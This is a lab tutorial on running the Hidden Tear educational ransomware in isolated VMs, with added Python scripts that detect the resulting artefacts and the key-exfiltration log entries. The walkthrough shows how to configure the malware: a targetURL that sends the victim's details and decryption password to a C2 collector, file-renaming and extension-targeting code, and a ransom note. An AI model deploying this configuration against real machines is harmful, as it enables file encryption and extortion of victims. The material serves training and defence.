Ransomware Simulation (Hidden Tear)

From Embedded Lab Vienna for IoT & Security

Introduction

Ransomware is a type of malicious software designed to encrypt files or block access to systems until a ransom is paid, often in cryptocurrency like Bitcoin. Ransomware has evolved significantly over time and can be categorized into two main types:

  • Locker Ransomware: Locks access to the entire system or device.
  • Crypto Ransomware: Encrypts specific files, rendering them inaccessible without a decryption key.

The global damage caused by ransomware attacks has reached staggering figures, with costs estimated to exceed billions of dollars annually. These damages include ransom payments, downtime, data loss, and recovery expenses, highlighting the severe impact ransomware can have on businesses and individuals. The evolution of ransomware dates back to the first known example, the AIDS Trojan in 1989, which was distributed via floppy disks. Over the years, ransomware has become more sophisticated, with notable examples like CryptoLocker (2013), WannaCry (2017), and modern variants such as Ryuk and Conti targeting critical infrastructure and large organizations.


Typical Ways of Infection

  • Phishing Emails: Malicious attachments or links trick users into executing ransomware.
  • Drive-by Downloads: Visiting compromised websites results in automatic malware downloads.
  • Insecure Remote Desktop Protocol (RDP): Attackers exploit weak passwords or RDP ports exposed to the internet.
  • Infected USB Devices: Malware spreads through external storage devices.

Once a system is infected, ransomware typically leaves behind various artefacts, such as:

  • Encrypted Files: Files are renamed with unusual extensions (e.g., .crypt or .lock).
  • Ransom Notes: Instructions for paying the ransom, often in text files (e.g., README.txt or DECRYPT_INSTRUCTIONS.txt).
  • System Modifications: Changes to registry keys, scheduled tasks, or startup entries to maintain persistence.
  • Network Activity: Evidence of communication with Command-and-Control (C2) servers, often through encrypted or Tor-based channels.
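To turn the artefact list above into a check you can run against a test directory after a simulation, here is an added Python example; it is not part of the original page or of the Hidden Tear project. It walks a directory tree and reports files carrying the unusual extensions named above, dropped ransom notes, and files whose byte entropy is close to the maximum, which is how encrypted content looks on disk. The extension list, the note names, the entropy threshold and the sample tree it builds in a temporary directory are assumptions constructed for this example.

```python
"""Scan a directory for the on-disk artefacts a crypto-ransomware run leaves behind:
files renamed with unusual extensions, dropped ransom notes, and files whose content
looks encrypted (near-maximal byte entropy). Lists and threshold are assumptions."""
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Extensions and note names taken from this page; an assumption for real deployments,
# where they would come from threat intelligence.
SUSPICIOUS_EXTENSIONS = {".locked", ".crypt", ".lock"}
RANSOM_NOTE_NAMES = {"readme.txt", "decrypt_instructions.txt", "read_it.txt"}
ENTROPY_THRESHOLD = 7.5   # bits per byte; text and most documents sit well below this
MIN_SIZE = 256            # too few bytes give a meaningless entropy estimate


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (8.0 for uniformly random bytes)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def scan_for_artifacts(root: str) -> dict:
    """Walk `root` and return sorted relative paths per artefact class."""
    findings = {"renamed": [], "ransom_notes": [], "high_entropy": []}
    root_path = Path(root)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            rel = p.relative_to(root_path).as_posix()
            if p.suffix.lower() in SUSPICIOUS_EXTENSIONS:
                findings["renamed"].append(rel)
            if name.lower() in RANSOM_NOTE_NAMES:
                findings["ransom_notes"].append(rel)
            try:
                data = p.read_bytes()
            except OSError:
                continue   # unreadable file: skip the content check
            if len(data) >= MIN_SIZE and shannon_entropy(data) >= ENTROPY_THRESHOLD:
                findings["high_entropy"].append(rel)
    for paths in findings.values():
        paths.sort()
    return findings


def build_sample_tree(root: str) -> None:
    """Constructed sample: a test directory as it would look after a simulated run."""
    test_dir = Path(root) / "Desktop" / "test"
    test_dir.mkdir(parents=True)
    # Encrypted and renamed file: random bytes stand in for ciphertext.
    (test_dir / "notes.txt.locked").write_bytes(os.urandom(4096))
    # Ransom note with the text the page configures.
    (test_dir / "READ_IT.txt").write_text(
        "Files has been encrypted with hidden tear\nSend me some bitcoins\n")
    # Plaintext file outside the configured extension list: must not be flagged.
    (test_dir / "untouched.log").write_text("lorem ipsum dolor sit amet\n" * 100)


def demo() -> dict:
    """Build the sample tree in a temporary directory, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_for_artifacts(tmp)


if __name__ == "__main__":
    for artefact_class, paths in demo().items():
        print(f"{artefact_class}: {paths or '-'}")
```

Point scan_for_artifacts at the victim VM's test directory (or a forensic copy of it) to get the same three lists for a real run; the entropy check is what catches encrypted files even when the extension has not been changed.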


Purpose of a Simulation

Conducting a ransomware simulation using a tool like Hidden Tear serves several critical purposes:

  • Testing Security Infrastructure: Identifying vulnerabilities in existing systems and defenses.
  • Training Personnel: Providing hands-on experience for IT and non-IT staff to recognize and respond to ransomware incidents.
  • Improving Incident Response: Allowing teams to practice containment, eradication, and recovery processes in a controlled environment.


What is Hidden Tear?

Hidden Tear is an open-source ransomware project developed for educational purposes. It demonstrates the principles of file encryption and ransom demands in a controlled, non-malicious manner. Hidden Tear encrypts files on a target system using basic cryptographic techniques and displays a ransom note, making it a suitable tool for safe simulations.

Step-by-Step Guide: Ransomware Simulation with Hidden Tear

Setting up the Environment

First, create the victim machine, on which the Hidden Tear ransomware will be installed and configured:

  1. Install Virtualization Software like VirtualBox on your main machine.
  2. Set up a new virtual machine and install Windows (e.g., Windows 10)[1], be sure to assign enough resources to the VM (e.g., 2 CPUs, 4GB RAM, and 40GB disk space).
  3. After the installation, configure two network adapters: a NAT adapter so the VM has internet access, and a host-only adapter that forms the isolated private network.
[Screenshot: NAT adapter settings]
[Screenshot: Host-only adapter settings]


Now create the Kali Linux virtual machine, which will act as the attacker's machine:

  1. Create a Kali Linux virtual machine. This will be the C2 server to which the ransomware sends the decryption key.[2]
  2. Configure it with similar resource allocations and the same network settings as the Windows machine.


Next, you need to install the required tools on the VMs:

On the Windows VM:

  1. Install Visual Studio Community Edition for editing and compiling the Hidden Tear source code.[3]
  2. Download Hidden Tear from its GitHub repository.

On the Kali VM:

  1. Update and upgrade the system.
  2. Install apache2 to set up a web server, which will act as the C2 server.
[Screenshot: Apache2 web server]


Now ensure both VMs can communicate by configuring the host-only network. Assign static IP addresses to the VMs within the same subnet (e.g., 192.168.56.101 for Windows, 192.168.56.102 for Kali). Last but not least, you need two files on your apache2 web server:

  • keys.php
  • data.txt

The keys.php script receives the information sent from the victim's machine (e.g. device name, username and decryption password) and writes it into the data.txt file:

[Screenshot: keys.php]



Configuring Hidden Tear

Edit the source code on Windows in Visual Studio:

  1. Open the Form1.cs file in Visual Studio.
  2. Look for the following lines of code and change them according to your configuration:

Modify the code to send the encryption key to a server hosted on your Kali VM:

string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

Change the file extensions to your liking:

System.IO.File.Move(file, file+".locked");

Update the list of target file extensions (the validExtensions array shown here) to include the specific file types you wish to encrypt, such as:

var validExtensions = new[] {
".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
};

Declare the path to the directory which should be encrypted:

string path = "\\Desktop\\test";

Modify the ransom note:

string path = "\\Desktop\\test\\READ_IT.txt";
string[] lines = { "Files has been encrypted with hidden tear", "Send me some bitcoins" };

Now apply the same configuration changes (e.g. the file extension) in the decrypter project, then build both projects in Visual Studio to generate the executables hidden-tear.exe and hidden-tear-decrypter.exe; they are placed in the .\bin\Debug directory.

Executing the Simulation

  1. Create a test directory on your desktop and put a .txt file with some random text into it.
  2. Run the hidden-tear.exe file.
  3. Observe the encryption process, including the renaming of the files and the creation of the ransom note.
  4. Confirm that the targeted files are encrypted and inaccessible.

Now look into your data.txt file and check the information written into it. The last part is the randomly generated decryption password.

[Screenshot: data.txt]


Finally, run hidden-tear-decrypter.exe and use the password recorded in the data.txt file to decrypt all the files in your test directory.
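The data.txt file is only one side of the evidence the simulation produces on the C2 server: the key transmission also lands in the Apache access log on the Kali VM, which is where a blue team would look for it. As an added example for that detection side (not part of the original page or of Hidden Tear), the following Python script parses Apache combined-format log lines and raises an alert for every request to the collector script that carries an `info` query parameter, the way the configured targetURL delivers the victim details. The log lines, the IP addresses (taken from the subnet example above), the collector script names (keys.php and write.php from this page) and the content of the `info` value are constructed assumptions.

```python
"""Flag Hidden Tear style key exfiltration in Apache access-log lines.

In the simulation the ransomware sends the victim's details and the decryption
password as the `info` query parameter of a GET request to the collector script on
the C2 web server, so server-side the exfiltration shows up as one access-log line.
Sample lines, addresses and the `info` value below are constructed for this example.
"""
import re
import sys
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Collector script names mentioned on the page; assumption: extend for other set-ups.
COLLECTOR_SCRIPTS = {"keys.php", "write.php"}
KEY_PARAM = "info"

# Constructed sample log: one exfiltration, one ordinary page hit, one hit on the
# collector without the parameter (e.g. an analyst opening it), one unparsable line.
SAMPLE_LOG = """\
192.168.56.101 - - [10/Jan/2025:14:02:11 +0100] "GET /hidden-tear/keys.php?info=LABPC-labuser%20placeholderpass HTTP/1.1" 200 12 "-" "Mozilla/4.0"
192.168.56.101 - - [10/Jan/2025:14:02:12 +0100] "GET /index.html HTTP/1.1" 200 10918 "-" "Mozilla/5.0"
192.168.56.102 - - [10/Jan/2025:14:03:40 +0100] "GET /hidden-tear/keys.php HTTP/1.1" 200 12 "-" "curl/8.0"
this line is not in the combined log format and is skipped
"""


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_exfil_requests(lines):
    """Return an alert dict for every request to a collector script carrying `info`."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        parts = urlsplit(entry["target"])
        script = parts.path.rsplit("/", 1)[-1]
        query = parse_qs(parts.query)
        if script in COLLECTOR_SCRIPTS and KEY_PARAM in query:
            alerts.append({
                "src": entry["ip"],
                "time": entry["time"],
                "script": script,
                "info": query[KEY_PARAM][0],   # percent-decoded victim details
                "status": int(entry["status"]),
            })
    return alerts


def demo():
    """Run the detector over the constructed sample log."""
    return find_exfil_requests(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    # Optional: pass the path of a real access log, e.g. /var/log/apache2/access.log
    if len(sys.argv) > 1:
        source = open(sys.argv[1], encoding="utf-8", errors="replace")
    else:
        source = SAMPLE_LOG.splitlines()
    for alert in find_exfil_requests(source):
        print(f"[ALERT] {alert['time']} {alert['src']} -> {alert['script']} "
              f"info={alert['info']!r}")
```

The alert carries the source address, so cross-checking it against the static IP assigned to the Windows VM confirms which host in the host-only network sent its key; the same parse-and-match pattern works for any web-based collector once the script name and parameter are known.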


References